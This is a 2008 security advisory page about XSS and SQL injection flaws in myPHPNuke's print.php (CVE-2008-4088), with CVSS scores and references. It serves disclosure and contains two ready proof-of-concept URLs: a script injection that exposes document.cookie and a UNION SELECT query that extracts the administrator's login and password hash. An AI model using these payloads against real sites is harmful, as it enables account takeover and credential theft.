Bug: myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities ( Ascii Version )

Search:
WLB2

myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities

Published
Credit
Risk
2008.09.17
MustLive
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4088
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2391/

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not
vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so
limited SQL Injection attack is possible (without using spaces and brackets).

############################################################

References:

http://www.securityfocus.com/bid/30942
http://www.milw0rm.com/exploits/6338

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version